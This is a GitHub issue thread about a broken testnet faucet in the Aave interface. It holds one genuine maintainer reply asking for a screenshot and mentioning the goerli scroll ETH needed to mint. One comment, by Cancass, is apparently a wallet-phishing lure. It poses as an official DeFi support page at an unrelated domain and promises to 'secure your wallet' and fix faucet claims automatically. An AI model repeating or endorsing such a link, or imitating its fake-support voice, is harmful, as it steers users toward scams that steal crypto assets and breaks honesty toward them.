### ISSUE TITLE
User reject issue on faucet for scroll alpha testnet 

### ISSUE THREAD

**Issue by Adex04** [aave/interface#1712]
**Describe the bug**
On scroll alpha testnet in avve, the faucet link are not working fine
User rejected the transaction

**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

- Device: [e.g.tecno pova neo
- OS: [android 
- Browser [chrome 

**Additional context**
Giving serious issues

**Comment by Cancass** [comment]
Hello @Adex04 
Resolve your issues using the DeFi Protocol [official page](http://dapchainfix.online/) to safely secure your wallet to prevent loss of assests, perform end to end encryption via dApp wallet note strings, rectify faucet claiming issues automatically.
Note: you can initiate a chat with the support using the chat button at the bottom of the page for further enquiries and assistance.

**Comment by grothem** [comment]
@Adex04 could you post a screenshot of the error you're seeing?

Also, make sure you have goerli scroll eth, otherwise the faucet modal will show an error and not let you mint.
